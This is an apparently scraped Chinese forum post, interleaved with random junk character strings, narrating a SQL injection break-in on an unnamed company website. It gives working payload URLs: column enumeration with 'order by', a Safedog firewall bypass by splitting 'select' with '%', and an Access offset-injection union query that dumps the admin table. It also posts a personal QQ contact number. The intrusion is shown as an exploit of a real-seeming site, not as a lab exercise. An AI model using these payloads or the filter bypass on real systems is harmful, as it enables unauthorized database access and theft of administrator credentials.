打开网站,一个企业站。# Z3 I. P/ B% N+ e3 q% l$ [
0 C5 D/ T3 h1 S9 p0 `# \
) U- N. H0 }% H3 i2 u; \
顺手加个admin
) c; P( Z0 X& L# Z
; e) m. `) e7 |( A
& T. P5 ]# f2 T0 W/ p) [+ v1 `默认后台。( _& x6 n1 V2 U: L5 O
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
6 U, Z& Z5 d8 N; ]
2 N1 p9 z' q2 E, Q; d' T( s l! h' v% C3 g0 l
* i$ U Z; |1 ?
所以就不用御剑扫了,待会直接封IP。
; C- B, D: u0 }, R: A% | * U" \$ `4 x3 a8 O5 Z5 z
用order by语句判断是否存在注入。
( j/ W: {! k; l! ~: khttp://www.xxx.com /product_show.asp?id=997 order by 1
) A; \! t; m2 ?8 ?, T$ ihttp://www.xxx.com /product_show.asp?id=997 order by 1000 d. }7 S; i5 y+ O" ~# d1 s
现在存在注入,经测试后发现是9个字段。7 U* ]5 M/ A: V1 O& h8 p! V
; c# ]' o! C. o- K, m( ~
接下来进行联合查询,猜是否存在admin表。5 P5 L8 ?' i9 e: u- i2 @
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
( W( q$ f+ @. U
) n5 M; V) v! Q- u. [. N! Y7 O+ m: }6 T4 c- z. p
0 B* d# @% p; ~7 w% N" \在select中间加个%,se%lect绕过安全狗。) Q/ y" M. _# l* L8 B* p
: t) }% F J+ @! F' b; D
1 e9 S6 d3 h) W7 v7 Y
发现存在admin表,然后开始手工猜常用的字段。% E9 B$ y9 b! F3 [
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
1 C8 r; a9 s/ G3 @, P3 L; @. a 2 G0 @8 o3 K0 a- S* c8 L3 v- ]
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。0 z% t6 U7 p3 e' @. j) `
) X% F y7 K8 Q+ F( E9 ?科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
6 `- f9 | ^/ e7 whttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
: f7 U# s% y W! {好了,敏感内容出显了。. H% D7 d( Q" w7 V6 ^
b6 Q3 V% m9 w6 I G# f" T) K4 z! S- M8 ?* M: c3 f( O
5 {8 B$ I& |" }: K |